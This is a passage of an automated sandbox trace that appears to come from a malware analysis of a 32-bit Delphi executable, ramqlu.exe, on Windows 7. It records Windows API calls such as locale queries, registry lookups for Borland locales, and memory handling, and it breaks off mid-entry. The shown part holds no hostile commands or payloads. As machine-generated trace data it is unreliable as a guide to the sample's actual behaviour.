# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Mar 3 2020 14:14:30 # Log Creation Date: 19.04.2020 12:27:01.230 Process: id = "1" image_name = "ramqlu.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe" page_root = "0x49197000" os_pid = "0x4e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xb10 [0049.862] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0049.863] GetKeyboardType (nTypeFlag=0) returned 4 [0049.864] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" " [0049.864] GetStartupInfoA (in: lpStartupInfo=0x18fef8 | out: lpStartupInfo=0x18fef8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0049.864] GetACP () returned 0x4e4 [0049.864] GetCurrentThreadId () returned 0xb10 [0049.864] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ede8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 
0x30 [0049.878] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ecc3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x30 [0049.878] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0049.878] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0049.879] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0049.879] lstrcpynA (in: lpString1=0x18ecc3, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" [0049.879] GetThreadLocale () returned 0x409 [0049.879] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18edd3, cchData=5 | out: lpLCData="ENU") returned 4 [0049.880] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe") returned 48 [0049.881] lstrcpynA (in: lpString1=0x18ecf0, lpString2="ENU", iMaxLength=216 | out: lpString1="ENU") returned="ENU" [0049.881] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0049.881] lstrcpynA (in: lpString1=0x18ecf0, lpString2="EN", iMaxLength=216 | out: lpString1="EN") returned="EN" [0049.881] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: 
hInstance=0x400000, uID=0xffc0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.881] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe1, 
lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.882] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0049.882] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0049.883] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") 
returned 0x0 [0049.883] GetVersionExA (in: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4, dwMinorVersion=0x140000, dwBuildNumber=0x18fec4, dwPlatformId=0x76c1e37d, szCSDVersion="ÿÿÿÿ") | out: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.883] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0049.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0049.883] GetThreadLocale () returned 0x409 [0049.883] GetSystemMetrics (nIndex=42) returned 0 [0051.790] GetThreadLocale () returned 0x409 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jan") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd74, cchData=256 | out: lpLCData="January") returned 8 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Feb") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd74, cchData=256 | out: lpLCData="February") returned 9 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mar") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="March") returned 6 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Apr") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="April") returned 6 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="May") returned 4 [0051.790] GetLocaleInfoA (in: 
Locale=0x409, LCType=0x49, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jun") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="June") returned 5 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Jul") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="July") returned 5 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Aug") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="August") returned 7 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sep") returned 4 [0051.790] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd74, cchData=256 | out: lpLCData="September") returned 10 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Oct") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd74, cchData=256 | out: lpLCData="October") returned 8 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Nov") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd74, cchData=256 | out: lpLCData="November") returned 9 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Dec") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd74, cchData=256 | out: lpLCData="December") returned 9 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sun") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sunday") returned 7 [0051.791] GetLocaleInfoA (in: 
Locale=0x409, LCType=0x31, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mon") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Monday") returned 7 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tue") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wed") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thu") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thursday") returned 9 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Fri") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Friday") returned 7 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sat") returned 4 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Saturday") returned 9 [0051.791] GetThreadLocale () returned 0x409 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="$") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 
[0051.791] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec8, cchData=2 | out: lpLCData=".") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="2") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec8, cchData=2 | out: lpLCData="/") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0051.792] GetThreadLocale () returned 0x409 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0051.792] GetThreadLocale () returned 0x409 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec8, cchData=2 | out: lpLCData=":") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="AM") returned 3 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="PM") returned 3 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0051.792] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0051.792] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=17214726634) returned 1 [0051.793] GetModuleHandleA (lpModuleName="oleaut32.dll") 
returned 0x76e40000 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0051.793] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0051.794] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0051.795] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0051.796] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0051.796] GetProcAddress (hModule=0x76e40000, 
lpProcName="VarBstrFromBool") returned 0x76e60355 [0051.797] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.797] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.797] GlobalUnlock (hMem=0x270004) returned 0 [0051.798] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.798] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.798] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.798] GlobalUnlock (hMem=0x270004) returned 0 [0051.798] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.798] GlobalUnlock (hMem=0x27000c) returned 0 [0051.799] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.799] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.799] GlobalUnlock (hMem=0x27000c) returned 0 [0051.799] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.799] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.799] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.799] GlobalUnlock (hMem=0x27000c) returned 0 [0051.799] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.800] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.800] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.800] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.800] GlobalUnlock (hMem=0x270004) returned 0 [0051.800] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.800] GlobalUnlock (hMem=0x27000c) returned 0 [0051.800] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.800] GlobalUnlock (hMem=0x27000c) returned 0 [0051.800] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.800] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.800] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.800] GlobalUnlock (hMem=0x27000c) returned 0 [0051.800] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.800] 
GlobalUnlock (hMem=0x270004) returned 0 [0051.801] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.801] GlobalUnlock (hMem=0x270004) returned 0 [0051.801] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.801] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.801] GlobalUnlock (hMem=0x270004) returned 0 [0051.801] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.801] GlobalUnlock (hMem=0x27000c) returned 0 [0051.801] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.801] GlobalUnlock (hMem=0x27000c) returned 0 [0051.801] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.801] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.801] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.801] GlobalUnlock (hMem=0x27000c) returned 0 [0051.801] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.801] GlobalUnlock (hMem=0x270004) returned 0 [0051.802] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.802] GlobalUnlock (hMem=0x270004) returned 0 [0051.802] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.802] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.802] GlobalUnlock (hMem=0x270004) returned 0 [0051.802] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.802] GlobalUnlock (hMem=0x27000c) returned 0 [0051.802] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.802] GlobalUnlock (hMem=0x27000c) returned 0 [0051.802] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.802] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.802] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.802] GlobalUnlock (hMem=0x27000c) returned 0 [0051.802] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.803] GlobalUnlock 
(hMem=0x270004) returned 0 [0051.803] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.803] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.803] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.803] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.803] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.803] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.803] GlobalUnlock (hMem=0x27000c) returned 0 [0051.803] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.803] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.803] GlobalUnlock (hMem=0x27000c) returned 0 [0051.803] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.803] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.803] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.803] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalReAlloc (hMem=0x270004, dwBytes=0x10, uFlags=0x2) returned 0x270004 [0051.804] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.804] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.804] GlobalUnlock (hMem=0x27000c) returned 0 [0051.804] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.804] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.804] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.804] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.804] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.804] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.804] GlobalUnlock (hMem=0x270004) returned 0 [0051.804] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.804] GlobalUnlock (hMem=0x27000c) returned 0 [0051.805] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.805] GlobalUnlock (hMem=0x27000c) returned 0 [0051.805] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.805] 
GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.805] GlobalUnlock (hMem=0x27000c) returned 0 [0051.805] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.805] GlobalUnlock (hMem=0x270004) returned 0 [0051.805] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.805] GlobalUnlock (hMem=0x270004) returned 0 [0051.805] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.805] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.805] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.805] GlobalUnlock (hMem=0x270004) returned 0 [0051.805] GlobalHandle (pMem=0x5d0608) returned 0x27000c [0051.805] GlobalUnlock (hMem=0x27000c) returned 0 [0051.806] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.806] GlobalUnlock (hMem=0x27000c) returned 0 [0051.806] GlobalLock (hMem=0x27000c) returned 0x5ce5f8 [0051.806] GlobalLock (hMem=0x270004) returned 0x5d0608 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x27000c [0051.806] GlobalUnlock (hMem=0x27000c) returned 0 [0051.806] GlobalHandle (pMem=0x5d0608) returned 0x270004 [0051.806] GlobalUnlock (hMem=0x270004) returned 0 [0051.806] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.806] GlobalHandle (pMem=0x5ce5f8) returned 0x270004 [0051.806] GlobalUnlock (hMem=0x270004) returned 0 [0051.806] GlobalLock (hMem=0x270004) returned 0x5ce5f8 [0051.806] GlobalLock (hMem=0x27000c) returned 0x5d0608 [0051.806] 